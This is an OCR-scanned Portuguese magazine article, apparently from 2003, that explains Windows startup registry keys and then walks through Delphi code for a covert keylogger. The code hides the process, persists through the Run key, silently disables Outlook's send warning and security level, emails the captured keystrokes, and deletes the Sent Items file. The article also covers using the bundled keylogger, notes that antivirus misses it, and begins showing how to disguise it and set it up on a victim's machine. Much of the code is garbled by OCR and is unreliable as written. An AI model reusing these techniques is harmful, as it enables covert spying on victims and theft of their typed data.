backup do setor do boot (MBR - Master 
Boot Record) do HD. Já os vírus iniciados 
em conjunto com o Windows podem ser 
reparados sem maiores problemas, desde 
que, é claro, não afetem o próprio sistema 
operacional; nesta hipótese, o que resta é 
reinstalar o Windows. 

Muitos vírus possuem data de ativação, 
o que significa que a ação destruidora só 
acontece em certa data predeterminada 
(ex.: Sexta-feira 13 ou alguma data especial 
para o programador). Dessa forma, nada 
impede que desativemos o vírus antes que 
“exploda”. Para isso, é preciso descobrir, 
primeiramente, como o vírus é iniciado. 

As formas de execução podem variar 
conforme a versão do Windows, por 
exemplo: nas versões 95 e 98 do Win- 
dows, é possível iniciar um programa 
inserindo a respectiva chamada no “au- 
toexec.bat”, enquanto que no Windows 
Millennium Edition isso não é possível. 
Por esse motivo, alguns vírus projetados 
para Windows 95 não funcionam no 
Windows Millennium. 

Aliás, já que citei o Windows 95 e o 
autoexec.bat, vou aproveitar para citar 
uma curiosidade relacionada aos progra- 
mas mais antigos distribuídos para uso 
por tempo determinado: bastava inserir 
o comando “date” (ex.: date 17/10/1980) 
no “autoexec.bat” para que o programa 
fosse utilizado por tempo indeterminado. 
Com isso, cada vez que o Windows fosse 
iniciado, a data do sistema seria alterada 


para a que especificássemos depois do 
comando. Dessa forma a data nunca 
mudaria e o tempo de uso do programa 
nunca expiraria, pois sempre estaríamos 
no primeiro dia de uso. 

Voltando ao estudo a que nos propo- 
mos, vejamos mais um modo de execução, 
vale dizer, o mais utilizado por ser com- 
patível com os sistemas Windows 95, 98, 
Me e XP. Trata-se do registro, o cérebro 
do Windows, local onde são armazenadas 
todas as informações fundamentais do 
sistema operacional. 

Antes de qualquer coisa, fica a adver- 
tência: use o registro do Windows por sua 
conta e risco. Erros podem fazer com que o 
sistema não seja mais iniciado. Portanto, 
tenha prudência. Siga rigorosamente os 
procedimentos aqui descritos e, haven- 
do dúvida, não faça qualquer alteração 
(deixo meu e-mail disponível para o leitor 
no fim do artigo). 

Para abrir o editor do registro, clique 
no menu Iniciar do Windows e depois 
em Executar (ou pressione Winkey + RJ, 
digite REGEDIT e tecle ENTER: 


&: Editor do Registro 
Registo Editar Exbi Favorios Ajuca 
EB Meu computado: E 

68 (3 HKEv CLASSES ACOT 

869 HKEY CURSENT USER 

1 HREY LOCAL MACHINE 

ED HKEY USERS 


E HKEY CURIENT CONTI 
0 HKEY.DYN DATA 


Valores e dados 


Essas pastas são chamadas “chaves do 
registro”. Na metade do lado direito são 
exibidos os valores contidos em cada chave, e 
cada valor contém um conjunto de dados. 

Cada chave tem uma função específica: 
DHKEY CLASSES ROOT: na verdade é um 
atalho para a chave HKEY LOCAL MACHI- 
NEISOFTWARENCLASSES, cuja finalidade é 
manter a compatibilidade com os aplicativos 
16 bits; isto porque o registro do Windo- 


ws 3.x apresentava uma chave chamada 
HKEY CLASSES ROOT; 


2)HKEY CURRENT USER: outro ata- 
lho. Esse serve para a chave relativa ao 
usuário que fez o logon no sistema (ex: 
HKEY USERSIJULIANO, já que JULIA- 
NO corresponde ao nome do usuário, ou 
HKEY USERS1.DEFAULT); 


3)HKEY LOCAL MACHINE: éa chave mais 
importante; nela encontramos as configura- 
ções do Windows, dados de programas insta- 
lados e periféricos. Essa chave é armazenada 
no arquivo system.dat; 


4)HKEY USERS: armazena as configura- 
ções de cada usuário. Quando há o logon, 
há a escolha por uma de suas chaves. O 
conteúdo dessa chave é armazenado no 
arquivo user.dat; 


5)HKEY CURRENT CONFIG: outro 
atalho, este para HKEY. LOCAL. MACHI- 
NEIConfigi0001 (os números finais cor- 
respondem ao perfil de hardware e podem 
variar); caso haja mais de um perfil, você 
pode verificar qual é o utilizado pelo sis- 
tema verificando o valor “CurrentConfig” 
na chave HKEY LOCAL MACHINENCur- 
rentControlSetControNIDConfigDB; 


6)HKEY DIN DATA: essa chave é curio- 
sa; todas as informações nela contidas 
(reunidas durante o boot e armazenadas 
na memória RAM) são dinâmicas, ou seja, 
só existem até que a sessão seja finalizada, 
não são armazenadas em arquivo e os da- 
dos se referem, por exemplo, a dispositivos 
Plug and Play. 


Entendido o funcionamento do registro 
do Windows, vamos ao que interessa: 


uma das chaves responsáveis pela exe- 


cução de aplicativos durante o boot do 
sistema é: 


HKEY LOCAL MACHINEISOFTWA- 
RElMicrosoftl WindowslCurrentVer- 
sionlRun 


Cada um desses valores se refere a um 
programa que é executado junto com o 
boot do Windows, com exceção do valor 
“(Padrão)”, pois é um valor vazio (não 
contém dados). 

Se quiser que o sistema pare de executar 
alguns desses programas durante o boot, 
basta apagar o valor ou os dados dentro 
do valor. Para apagar um valor, dê um 
clique simples sobre ele com o mouse, 
tecle delete e confirme a exclusão. Para 
apagar os dados de um valor, clique duas 
vezes sobre ele com o mouse e apague 
os dados (veja a tela abaixo); confirme 
clicando em OK. 


squência 


No caso da tela anterior, com exceção 
do “Tweak UI”, todos os programas são 
essenciais ao sistema e devem ser execu- 
tados, principalmente o SysTray.exe. 

Uma forma mais simples é utilizar um 
utilitário distribuído a partir do Windows 


98, o MSCONFIG. Para abri-lo, clique em 
Executar, no menu Iniciar, digite MSCON- 
FIG e tecle Enter. Escolha a aba Iniciar: 


Registro (ezecução por computador) 
Registro [execução por computador) 


Registro (ezecução por computador) 
Regstro (ezecução por computador) 
Registro (execução por computador) 
Registro [ezecução por computador] 
Registro (execução por computador) 
Registro (ezecução por computador) 
Registro (ezecução por computador) 


Agora você pode desmarcar as caixas 
referentes aos aplicativos que não devem 
ser executados no próximo boot do siste- 
ma. Se ocorrer algo errado é só remarcar 
a caixa de seleção. 

Note que na janela do MSCONFIG estão 
relacionados outros aplicativos além dos 
que descobrimos dentro da chave do 
registro que acabamos de abrir. A razão 
é muito simples: outras chaves também 
informam os aplicativos que serão execu- 
tados durante o processo de boot: 


HKEY. LOCAL MACHINENSOFTWAREN 
MicrosoftiWindowsN CurrentvVer- 
sionYRunônce 


HKEY LOCAL MACHINENSOFTWAREN 
MicrosoftiWindowsN CurrentVer- 
sionyRunOnceEx 


HKEY LOCAL MACHINENSOFTWAREN 
MicrosoftiWindowsN CurrentVer- 
sionYRunServices 


HKEY LOCAL MACHINENSOFTWAREN 
MicrosoftiWindowsN CurrentVer- 


sionlRunServicesOnce 

HKEY. CURRENT USERNSoftwareN 
MicrosoftAiWindowsN CurrentVer- 
sionYRunonce 


HKEY. CURRENT USERNSoftwarel 
MicrosoftiWindowsY CurrentVer- 
sionkRun 


As chaves acima contêm os programas 
excluídos do processo de boot pelo MS- 
CONFIG. Quando um valor é desmarcado 
no MSCONFIG, ele é movido para uma 
chave-espelho. É 

Além do registro, o win.ini também 
carrega programas: 


Regidro (cerviço por >orputacor) 
Negistro [se-viço por zonputacor) 
Registro (serviço por zonpuacor) 
Registro (se viço por onputacor) 
Registro (se-viço por zonputacor) 


FundiZ. evo zowprof.diLo 
CNW/INDCWSNSystomhe: 


20% 


FAMAINDO WSASYETEM! 
iufianotoledo. 


Aplicativos que estão relacionados dentro do win.ini 
um deles na linha load e outros dois na linha run 


A maioria dos vírus possui um meca- 


nismo interessante: capturam o pedido de 
desligamento do computador e, nesse mo- 
mento, verificam se ainda estão marcados 
para serem carregados no próximo boot 
do sistema. Dessa forma, não adiantará 
desmarcá-lo no MSCONFIG; será preciso 
fazer isso sem que ele tenha sido executa- 
do, ou seja, fazendo o boot do computador 
no Modo de Segurança. 


Configure corretamente seu Outlook 
Express: clique no menu Ferramentas, 
escolha o item Opções... e selecione a 
aba Leitura: 


DDesmarque o item “Download auto- 


mático de mensagens ao usar o painel 
de visualização” ou desabilite o Painel de 
Visualização (Exibir, Layout e desmarque 
a opção “mostrar o painel de visualização” 
e clique em OK); isto porque existem vírus 
que são executados por script quando a 
mensagem é aberta automaticamente; 


2)Ainda na aba Leitura, marque a opção 
“Ler todas as mensagens em texto sem 
formatação”: 


5)Na aba Segurança, confirme se o 
item “Avisar quando outro aplicativo 
tentar enviar email como se fosse eu.” 
está marcado; 


4)Se preferir deixar desmarcada a 
opção Não permitir que sejam salvos 
nem abertos anexos que possam conter 
vírus., não se esqueça de verificá-los com 
o antivírus. 


Mas a melhor dica seria: não use o 
Outlook Express! Troque-o, por exem- 
plo, pelo The Bat! ou pelo Incredimail. 
Isto porque o gerenciador de e-mails da 
Microsoft é o principal alvo dos vírus. 
Enquanto não houver vírus destinado, por 
exemplo, ao The Bat!, seu computador 
estará a salvo. 


Entendendo o funcionamento do programa: 

Feitas as considerações iniciais, pode- 
mos estudar o funcionamento do pro- 
grama feito em Delphi. Os códigos-fonte 
do programa e de sua DLL não foram 
disponibilizados, visando evitar que se- 
jam alterados por programadores mal- 
intencionados. Não obstante, algumas 
de suas rotinas mais interessantes serão 
comentadas a partir de agora. Para tanto, 
trataremos o programa como se fosse 


um vírus, embora essa condição (como já 
ressaltado) seja apenas determinada pela 
utilização indevida do programa. 

A primeira necessidade que surge 
durante a programação de um vírus é es- 
condê-lo da barra de tarefas do Windows 
e da lista do Ctrl+Alt+Del. Isso era muito 
simples até o advento do Windows XP, 
pois bastavam as seguintes linhas: 


Function RegisterServiceproces 


s(dwProcessID, dwType: DWord): 
DWord; stdcall; external Ker- 
nel32.d1] 


Essa função pode ser usada, ocultando 
o programa da lista do Ctrl+Alt+Del, com 
o seguinte comando: 


RegisterServiceProcess(GetCurrentPr 
ocessiD, 1); 


Para que o programa seja novamente 
exibido: 


RegisterServiceProcess(GetCurr 
entProcessID, 0); 


A janela do programa pode ser escon- 
dida com o seguinte comando (este sim 
pode ser utilizado em todos os sistemas 
Windows): 


ShowWindow(application.Handle, 
sw hide); 


Mas há um porém, esse método só 
funcionará nos sistemas Windows 95, 
98 e Millennium. Se executado nos 
Windows XP, 2000 ou NT, aparecerá 
uma mensagem de erro e isso não é 
interessante para um programa que 
queremos que ocultar. O problema pode 
ser contornado com as seguintes linhas 
de código: 


type 

TRegisterService = function 
(dwProcessID, dwType:DWord): 
Dword;stdcall:; 

private 
RegisterServiceProcess: 
terService: 
Implementation 
function OcultaProcesso(DLL,Pro 


TRegis- 


cedimento: string):TFarProc: 
var 

Processo,Biblioteca THandle; 
begin 


Result:=nil: 
Biblioteca:=GetModuleHandle(Pc 
har(D11)) 

if Biblioteca <> O then 
Result:=GetProcAddress(Bibliot 


eca, Pchar(Procedimento)): 
end; 
No evento ON CREATE: 
Var 
Registro: Tregistry; 
begin 


ShowWindow(application.Handle 
sw hide); 
Registro:=Tregistry.create: 
Registro.Rootkey:=HKEY LO- 
CAL MACHINE: 
REGISTRO.Openkey('SoftwareNMi- 
crosoftiWindows" CurrentvVer- 
sion”, false): 


If Registro. 
ValueExists(“Version') then 
begin 
QRegisterServiceProcess:=0c 
ultaProcesso (KERNEL32.DLL”,' 
RegisterServiceProcess'): 
RegisterServiceProcess(GetCur 
rentProcessID, 1); 

end; 

end; 


O que demonstramos anteriormente 
é verificar se o sistema é Windows XP, 
para isso o programa procura pelo valor 
“Version” dentro da chave HKEY LO- 
CAL MACHINENSoftwarelMicrosoftY 
WindowsiCurrentVersion, pois esse 
valor não existe no Windows XP. Dessa 
forma, a rotina que oculta o aplicativo 
da lista de Ctrl+Alt+Del não será exe- 
cutada no Windows XP, e a mensagem 
de erro não será exibida. O programa 
seguirá oculto, apenas visível na lista 
dos programas executados e isso não dá 
para evitar. Caso algum leitor conheça a 
solução, compartilhe-a comigo (meu e- 
mail segue no fim da matéria). 

Para que o programa fique mais “leve” 
durante a execução, consumindo menos 
recursos do computador, podemos eli- 
minar alguns módulos desnecessários, 
retirando as units declaradas no uses 
e que não são usadas. Além disso, 
podemos liberar o módulo OLE Auto- 
mation, que não será usado, mediante 
o comando: 


FREELIBRARY(CGETMODULEHANDLE(O 
LEAUT 32 )); 


Isso tornará o programa mais rápido 
ao iniciar. 

Agora, vamos nos preocupar com a roti- 
na capaz de tornar nosso vírus “residente” 
no computador, fazendo com que seja 
executado a cada boot da máquina: 


Var 

Registro:Tregistry; 

XP, windir, boot: String: 
Begin 
REGISTRO.Openkey('SoftwareiMi- 
crosoftiWindowsN Currentver- 
sion”, false); 
Windir:=Registro.ReadString('S 


ystemRoot'); 

If Windir<>"" then //se a variá- 
vel não estiver vazia, o sistema 
é Win9x/ME 

Begin 

Registro.closekey; 
REGISTRO.Openkey ('SoftwareiMi- 
crosoftiWindows" CurrentVer- 
sionkRun”, TRUE); 
XP:=Windir[1]+Windir[2]+Windir 
[3]; //pega o disco usado (ex.: 
CN) 

Windir:=XP; 
boot:=Windir+'WindowsNSystem 
Programa.exe”; 
REGISTRO.WriteString(“Executa”, 


boot); //escreve o caminho do 
programa no Registro do Win- 
dows 

Registro.Closekey; 

end 


else //se a variável estiver vazia, 
o sistema é WinXP/2000/NT 

begin 
XP:=Registro.ReadString('*Progr 
amFilesDir'); 
windir:=XPLIJ+XPLZI+XPI3]; 
boot:=XP[L1]+XP[2]+XP[3]+'WINDO 
WSisystem32NPrograma.exe'”: 
Registro.closekey; 
REGISTRO.Openkey(“SoftwareNMi- 
crosoftiWindows" CurrentvVer- 
sionkRun”, TRUE); 
REGISTRO.WriteString(“Executa”, 
boot); //escreve o caminho do 
programa no Registro do Windows 
Registro.Closekey; 

end; 

end; 


Agora nosso programa já está oculto, 
não consta na lista do Ctrl+Alt+Del (se o 
sistema for win9x/ME) e será executado 
sempre que o Windows for iniciado. 

Mas ainda nos resta outro inconve- 


niente a ser resolvido: o programa deverá 
enviar por e-mail o arquivo que contém 
os dados recolhidos no computador. Isso 
só é problema se estamos lidando com o 
Outlook 6, pois entre suas opções de se- 
gurança há uma encarregada de alertar 


* ousuário quando outro programa tentar 


enviar e-mails utilizando o sistema do 
Outlook. Para conferir, abra o Outlook, 
clique no menu Ferramentas, depois em 
Opções..., escolha a aba Segurança e lá 
você encontrará a opção Avisar quando 
outro aplicativo tentar enviar email como 
se fosse eu, sugire-se manter-se sempre 
marcada essa opção. 

Para que o usuário não seja avisado 
quando nosso programa tentar enviar o e- 
mail, devemos implementar a seguinte ro- 
tina, que nada mais faz do que desmarcar a 
opção de segurança citada anteriormente, 
utilizando o Registro do Windows: 


Registro.Rootkey:=HKEY. CUR- 
RENT USER; 
Registro.Openkey(“Ndentities”, 
false); 
contas:=TStringList.Create: 
contas.Clear; 
registro.GetkeyNames(contas); 
registro.Closekey; 
Registro.Rootkey:=HKEY CUR- 
RENT USER; 

try 

for i:=0 to contas.Count-l do 
begin 

Ip Pe sans den dE Ss 
lEdResnatiste esse Esc O nEtEasss 
SL Tngs ES Sof twareNMa= 
crosos tXOuLtloock-= Express HA 
6.0')then 
begin registro.Openkey( 
Edrenet=Etae-sÃ-= as co0cnFlzass 
strings[il+” NSoftwareiMicro- 
softiOutlook Expressi6.0NMail”, 
false); 


INFECÇÃO 
PO; 


If Registro.ValueExists('Warn 


on Mapi Send”) Then Registro. 
NWriteInteger('Warn on Mapi 
Send”, 0); 

end; 

finally 


registro.Closekey: 


Para mudarmos o nível de segurança 
do Outlook estabelecendo-o como o mais 
baixo possível, poderíamos acrescentar: 


If Registro. 
ValueExists('Security La- 
bel") Then Registro. 
WriteInteger('Security Label”, 
O 


Mais um problema solucionado. Agora 
podemos nos preocupar com a rotina 
responsável pelo envio do e-mail; para isso 
bastarão as seguintes linhas: 


procedure EnviaE Mail(strCorpo, 
strAssunto, strNomeDestino, 
strMailDestino: string; 
strAnexo: string = *"): 
var 

SecaoMapi: cardinal; 

msg: TMAPIMessage; 


ResultadoMAPI: integer: 
Destinos: TMAPIRecipDesc; 
Args: TMAPIFileDesc;: 
MapiArq: boolean; 
begin 
ResultadoMAPI := MAPILo- 
gon(O, nil, -nil, O, O, ESeca- 
oMapi); 


MapiArq:=Length(Trim(strAnexo)) 
Zen) a 
if MapiArq then MapiArq: 
FileExists(strAnexo): 
if MapiArq then 
begin 
Args.nPosition:= 


ENE 
18.hacker 


Length(strCorpo): 
Args.lpszPathNa 
me:= PChar(strAnexo); 
Argqs.fikRlags: 
O; 
Args.lpFileType: 
nil 
Args.lpszFileNa 
me:= 


end; 

if ResultadoMAPI = 
CESS. SUCCESS “then 

begin 


SUC 


try 

FillChar(Destinos 
Size0f(Destinos), 0): 

Destinos.lpszName: 
PChar(strNomeDestino): 

Destinos.lpszAddress: 
PChar(strMailDestino): 

Destinos.ulRecipCllass: 
MAPI TO; 


h 


ESP Char ComEsig 


Size0f(msg), 0): 
msg.ulReserved:= O: 
msg:lpszSubject: 

PChar(strAssunto): 
msg.lpszNoteText: 

PChar(strlCorpo):; 
msg.nRecipCount:= 1; 
msg.TpDestinos:= QDesti 


nos; 
if MapiArq then 
begin 
msg.nFileCount: 
1; 
nisigr bp Res: 
BArgs; 
end; 
ResultadoMAPI 


h 


I 


MAPISendMail(SecaoMapi, O, msg, 


0, 0); 
finally 


MAPILogOff(SecaoMapi, O, 0, 


OU 


end; 
end; 
Para utilizar este procedimento, use o 
seguinte código: 


EnviaF Mail('“mensagem”, “As- 
sunto”, “Nome do destinatário”, 
“e-mail Edo.destinatario”, “ca 
windowskanexo.txt'): 

Como o e-mail será enviado pelo 
Outlook, ficará disponível na 
caixa de itens enviados. Surge- 
nos mais um problema a ser re- 
solvido: limpar a caixa de itens 
enviados. Todas as pastas do 
Outlook são armazenadas no di- 
retório C:AWINDOWSNApplication 
DatalidentitiesN[IDENTIDADEJN 
MicrosoftiOutlook Express: 


Sendo que IDENTIDADE é o código 
referente ao usuário registrado no Ou- 
tlook, chamado de User ID. Todas as 
identidades estão dentro da pasta Identi- 
ties e as informações de cada identidade 
estão no Registro do Windows, na chave 
HKEY CURRENT USERVdentities: 

Para limparmos a caixa de itens en- 
viados, basta excluirmos o arquivo Itens 
enviados.dbx. Na próxima execução do 
Outlook, o arquivo não será encontrado, 
e o Outlook se encarregará de criar uma 
nova caixa de itens enviados vazia. 

Com essa finalidade, escrevi uma rotina 
para varrer os diretórios à procura do 
arquivo Itens enviados.dbx: 


function Varre Diretorio(Dir. 
Inicial, Arq. Procurado: String): 
String; 
type 

TPilha= array of Variant; 
var 
p: TWIN32FindData: 
h: Thandle; 


dir, Dir Padrao: String; 

Pilha: TPilha; 

procedure Empilha(Dado: Va- 
riant); 

var 
P: Integer; 
begin 
SetLength(Pilha,High(Pilha)+ 
e) 


For P:= High(Pilha) downto 1 
do 

PilhalPJ:= PilhalP-1]; 
Pilha[0]:= Dado; 

end; 


function Desempilha: Variant; 
var 
P:Integer; 
begin 
Result s= ea» 
If High(Pilha) > -1 then 
begin 
Result:= Pilha[0]; 
for P:=l to High(Pilha) do 
PilhalP-1]:= PilhaCPJ; 
SetLength(Pilha,High(Pilha)): 
end; 
end; 

begin 


if Not SetCurrentDir(Trim(Dir 


Inicial)) then 


Result:= “Diretório Inválido” 
else 

begin 

Die Rosa, dep o a TO go 


Trim(GetCurrentDir); 
p.dwFileAttributes:= FILE AT- 
TRIBUTE NORMAL; 
h:="FindFirstFile(PChar('*.* 
Ma) 


Padrao),1) = *Nº then 
Di radio = 
Padrao,l,Length(Dir Padrao)- 
Us 

repeat 


f Copy(Dir Padrao,Length(Dir. 


Copy(Dir. 


tee Cro my Bda ses GDS 
Padrao+'NV+Trim(p.cFileName))) 
and 

(UC os po se satiap 
cfileName,Length(Trim(p.cFile- 
Name)),1) <> *.') then 
empilha(String(Dir Padrao+'N 
“+Trim(p.cFileName))); 
until Not FindNextFile(h,p); 
dir:= desempilha; 
while dir <> '“***º do begin 
if SetCurrentDir(dir) then be- 


gin 

h:= FindFirstFile(PChar('*.*") 
pos 

repeat 


if AnsilpperCase(Trim(p.cFileNa- 

me)) = AnsiUpperCase(Trim(Arq. 

Procurado)) then 

Result:= Result + (GetCurrentDir+ 

“+Trim(p.cFileName)); 

if (DirectoryExists 

(GetCurrentDir+'V+p.cFileName)) and 
MandG at Os sa Diroy s ls rera) 

cFileName,Length(Trim(p.cFile- 

Name)),1) <> *.') then 

empilha(String(GetCurrentDir+ 

“+Trim(p.cFileName))); 

until Not FindNextFile(h,p); 

end; 

dir:= desempilha; 

end; 

end; 

end; 


Agora é só usar a função: 


Var 

Registro: TRegistry; 
arquivo: String; 

begin 
Registro:=TRegistry.create; 


REGISTRO.Openkey( “Software 
MicrosoftiWindows ACurrentVer- 
sion”, false); 

arquivo:=Registro.ReadString 


(“SystemRoot'): 

arquivo:= Varre Diretorio(arq 
uivo+'WindowsYApplication Datal 
IdentitiesN, “Itens enviados. 
dbx ds 

If fileexists(arquivo)=true 
then DeleteFile(arquivo); 

End; 


Nosso último desafio será detectar a 
conexão, pois só então poderemos enviar 
o e-mail sem que haja erro. Para tanto, 
utilizaremos a chave dinâmica do Registro 
já estudada: HKEY DYN DATA. 

Na chave HKEY DYN DATAIPerfStatsl 
StartStat encontramos os dados da conexão 
Dial-Up. O que nos importará são os bytes 
recebidos (valor: Dial-Up AdapterlBytes- 
Recvd). Dessa forma, no evento OnCreate 
do programa capturaremos os dados desse 
valor em uma variável, então adicionaremos 
um Timer que verificará constantemente 
se o valor mudou; se mudou é porque há a 
conexão Dial-Up. Só há um problema: esse 
método só funciona para conexões do tipo 
Dial-Up. Conexões a cabo, Speed etc. não 
seerão detectadas, porque nesses casos 
inexiste a chave citada. Para contornar 
este problema, faremos o seguinte: verifi- 
caremos se a chave existe; se não existir é 
porque a conexão não é Dial-Up e o e-mail 
pode ser enviado a qualquer momento; se 
existir, capturaremos os dados referentes 
aos bytes recebidos e, quando mudarem, 
enviaremos o e-mail. 

Declararemos algumas variáveis antes 
da seção implementation: 


Var 

Buffer array [0..4096] of 
Char; 

Buffer2 array [0..4096] of 
Char; 


O código do evento OnCreate 
ficará assim: 


«mm, <« 


INFECÇÃO 


o 


Var 

Registro: Tregistry: 

begin 

Registro.Rootkey:=HKEY DYN. 
DATA; 

Registro.Openkey(“PerfStatsl 
StatData”, False): 

If Registro.ValueExists(“Dial- 
Up AdapterYBytesRecvd') then 

Begin 

Registro.ReadBinaryData(“Dial- 
Up AdapteriBytesRecvd”, Buffer, 
Size0f(Buffer)) 

Registro.Closekey:; 

Registro.Free; 

end; 

end; 

No Timer, o 
este: 

Var 


código seria 


Registro:TRegistry: 
begin 
Registro := 

te; 

Registro.Rootkey:=HKEY DYN 
DATA; 

Registro.O0Openkey('PerfStats 
StatData”, False); 

/[/Nerifica se existe a chave 
referente às conexões dial-up 

If Registro.ValueExists(“Dial- 
Up AdapteriBytesRecvd') then 

Begin 

Registro.ReadBinaryData(“Dial- 
Up AdapteriBytesRecvd”, Bu- 
ffer2, Size0f(Buffer2)): 

Registro3.Free; 

If Buffer2 <> Buffer then En- 
viaF Mail('mensagem”, “Assunto”, 
“Nome do destinatário”, “e-mail 
edo.destinatario”, “c:lwindowsN 
anexo.txt”); 

end 

/[l[se não existir, é pq a co- 
nexão não é dial-up, então o 
e-mail pode ser enviado... 


TRegistry.Crea- 


else EnviaE Mail('mensagem”, 
“Assunto”, “Nome do destinatá- 
rio”, “e-mail Gdo.destinatario”, 
“cilwindowslYanexo.txt'); 


É evidente que, quando digo que o 
e-mail pode ser enviado caso não haja 
conexão do tipo Dial-Up, não se trata 
de uma verdade absoluta. Afinal, pode 
ser que o usuário simplesmente não te- 
nha conexão à Internet. Por outro lado, 
usuários pouco experientes não sabem 
configurar o Speed para que se conecte 
automaticamente quando o computador 
é iniciado. Caso inexista a conexão auto- 
mática, o e-mail não será enviado. 

Os comandos responsáveis por captu- 
rar a digitação ficam por conta do leitor, 
assim como a implementação dos có- 
digos anteriormente relacionados, que 
sempre podem ser melhorados. 

Caso não se queira perder tempo 
programando a captação das teclas di- 
gitadas, pode-se usar o programa que 
está disponível no CD-ROM da revista. 
Para isso, leia a próxima seção, que 
contém as instruções de uso. 


USANDO O PROGRAMA 


A utilização do programa não requer 
conhecimentos avançados, basta exe- 
cutar o programa de instalação (Setup. 
exe) e concordar com a exigência da 
licença de uso, que é única: utilizar o 
programa apenas para fins lícitos, sem 
ofender direitos alheios. 

Concluída a instalação, clique no 
menu Iniciar, escolha o menu Progra- 
mas e clique em Ajustar. Será aberto 
o seguinte programa: 

Digite o endereço do e-mail pelo 
qual você deseja receber os relatórios 
do Keylogger, tecle Enter e espere a 


confirmação de que a operação ocorreu 


com sucesso.Agora é só esperar... 

Uma vez por dia, se houver conexão 
à Internet todos os dias, você receberá 
um e-mail contendo tudo o que foi 
digitado no computador em que o pro- 
grama está instalado. Não se esqueça 
de definir o endereço de e-mail, caso 
contrário haverá uma mensagem de 
erro: MAPI Initialization error [25]. O 
arquivo estará anexado e será como o 
seguinte: 


VEJA COMO É OE-MAIL NO OUTLOOK 


Para desinstalar, use a opção Adicio- 
nar ou Remover Programas, no Painel de 
Controle. No entanto, propositalmente, 
não há a desinstalação total do progra- 
ma. Isso para que possamos limpar o 
“vírus” manualmente. Depois de desins- 
talado, siga as instruções seguintes para 
removê-lo do sistema. 

Usaremos o TFAK, um scanner de 
Trojan Horses. Esse utilitário freeware 
(livre) possui um bom banco de dados, 
porém, assim como todos os outros 
antivírus do mercado, não detectará 
o nosso programinha. Evidentemente 
isso não persistirá por muito tempo, 
tão logo essa matéria seja publicada, os 
antivírus adicionarão o programa a seus 
bancos de dados virais. Até a data de 
hoje (01/03/2003), o programa não foi 
reconhecido por qualquer antivírus. 

Execute o programa de desinstalação 
do Capta Teclado (Meu Computador 
> Painel de Controle > Adicionar ou 
remover programas > Capta Teclado). 
Isso removerá apenas o utilitário de 
configuração, pois o programa com 
características virais continuará resi- 
dente na memória do computador. 

Agora sim estamos diante de um 
“vírus”. Execute o TFAK, escolha o 
menu Local e clique em Quais são os 


Processos Ativos?; o programa exibirá 
uma janela relacionando todos os pro- 
cessos ativos: 

Agora, como já sabemos quais são os 
programas normalmente executados com 
o boot do nosso computador (vimos an- 
teriormente no MSCONFIG), chegaremos 
facilmente ao vírus. 

Nesse caso, o programa viral é o capta. 
exe, como vemos, ele está no diretório 
CAWindowslSystem (o diretório pode 
variar conforme o sistema operacional e o 
número de unidades de HD existentes em 
seu computador). Vamos selecioná-lo na 
lista dos processos ativos e depois clicar 
no botão Finalizar Processo Selecionado, 
a partir de então poderemos deletar o pro- 
grama capta.exe em CAWindowslSystem. 
Para completar o trabalho, vamos deletar 
também sua DLL (cap.dll) e o arquivo de 
log (capta.txt). 

Agora podemos excluí-lo do boot do 
Windows. Para saber por onde ele é ini- 
ciado, voltaremos ao TFAK, clicaremos 
no menu Local e depois em O que é auto- 
iniciar?, então surgirá uma janela com 
todos os programas que são iniciados 
automaticamente. Na caixa Rotinas de 
auto-iniciar, podemos escolher entre o 
autoexec.bat, o registro do Windows, o 
win.ini, O system.ini e a pasta iniciar do 
menu Iniciar. 

Se escolhermos a opção Registryl, 
veremos o capta.exe entre os programas 
executados na inicialização do sistema. 

Podemos retirá-lo na inicialização do 
sistema pelo MSCONFIG, como já foi visto, 
ou pelo próprio TFAK. Para tanto, selecio- 
ne a linha com o programa a ser excluído 
e clique no botão Editar, depois selecione 
o programa novamente: 

E escolha a opção Apaga Valor. Feito 
isso, clique em Voltar, novamente esco- 
lha Voltar e depois feche o programa. 


Para se certificar de que o vírus inexiste 
em seu sistema, reinicie o computador 
e verifique se ele continua a ser iniciado 
pelo sistema. 

Finalmente o vírus foi completamente 
removido, então não se esqueça de res- 
taurar as opções de segurança do Outlook, 
conforme exposto anteriormente. 


A METAMORFOSE 


Já vimos como instalar, utilizar e 
desinstalar o programa. Vale a ad- 
vertência: o mecanismo de remoção 
do programa, presente em Adicionar 
ou Remover Programas, no Painel de 
Controle, não elimina completamente 
o programa com características vi- 
rais. Consta na licença do programa 
a exigência do uso para fins lícitos. 
A própria distribuição do produto, 
na forma de programa de instalação, 
visa também a reprimir o uso inde- 
vido do programa. Isso porque, se 
quiséssemos investigar o que é digi- 
tado em computador alheio, teríamos 
de ter acesso a ele para efetuarmos 
a instalação do programa. 

Todavia, como veremos agora, isso 
não é obstáculo para os usuários 
mal-intencionados. Fato que traz à 
memória a edição nº 21 desta revista, 
na qual foi publicado um artigo sobre 
falsificação de e-mails utilizando um 
programa de minha autoria. Idealiza- 
do para enviar mensagens eletrônicas 
mediante comandos do DOS, em 
outras palavras, projetado para fins 
lícitos, depois percebi que também 
poderia ser utilizado para falsificação 
de e-mails, em razão de uma falha na 
autenticação dos servidores SMTP. 
Uma conclusão é fundamental: em 
ambos os casos não há ilicitude no 
programa em si considerado, mas 


ilicitude no uso, quando indevido. 

A partir de agora, mostrarei como é 
feita a “camuflagem” do programa com 
características virais, capaz de trans- 
formá-lo em vírus de computador. Isso 
serve como advertência àqueles que, 
indiscriminadamente, abrem as anima- 
ções Flash recebidas por e-mail. 

Anteriormente vimos como descobrir 
quais os arquivos (executável e DLL) 
utilizados pelo programa. Mas não basta 
instalarmos esses arquivos nos diretó- 
rios corretos, será preciso determinar 
o e-mail para o qual serão enviadas as 
informações recolhidas no computador 
da vítima, assim como configurar o 
computador para executar o Keylogger 
a cada inicialização do sistema. 

Para configurar o e-mail, precisamos 
primeiramente saber em qual chave do 
registro é armazenada essa informação. 
Para tanto, abra o monitor do registro 
Regmon (disponível no CD-ROM), pres- 
sione Ctrl+L e, na seção Include, deter- 


mine qual processo será vigiado: 


Clique em Apply e depois pressione 
Ctrl+X para limpar os registros da janela. 
Certifique-se de que o programa está 
habilitado para capturar as alterações do 
registro, veja se a opção Capture Events, 
no menu Options, está marcada: 
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IMAGEM 2 

Agora, abra o utilitário de configuração 
do e-mail instalado junto com o programa, 
cujo atalho é disponibilizado no menu 
Iniciar do Windows. Após a instalação 
do programa Capta Teclado, digite seu 
endereço de e-mail e tecle Enter: 


FB Alloy - Untitled 


IMAGEM 3 

Agora, volte ao Regmon e procure pela 
chave do registro em que foi armazenada 
a informação: 


Or 


IMAGEM 4 

Resultado: o e-mail é armazenado na 
chave “HKEY. CURRENT USERNSoftwa- 
